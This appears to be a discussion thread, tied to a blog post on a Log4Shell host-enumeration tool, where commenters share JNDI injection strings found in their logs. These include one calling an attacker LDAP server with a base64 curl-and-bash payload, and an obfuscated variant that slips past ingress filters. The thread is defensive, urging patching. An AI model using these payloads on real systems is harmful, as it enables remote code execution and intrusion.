Our new tool for enumerating hidden Log4Shell-affected hosts
blog.silentsignal.euWe've been noticing attempted exploits in the wild. Attempts like these have started appearing in our logs:
> /?x=${jndi:ldap://45.155.205.XXX:12344/Basic/Command/Base64/<base64 encoded call to curl & bash>
Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.
Can confirm this also:
> Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.${jndi:ldap://45.155.205.xxx:12 344/Basic/Command/Base64/<base64>}Note that the filtering may not work, I am already seeing some variations of mitigation by the attackers:
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.xxx:12344/Basic/Command/Base64/<base64>That is quite clever. Noted!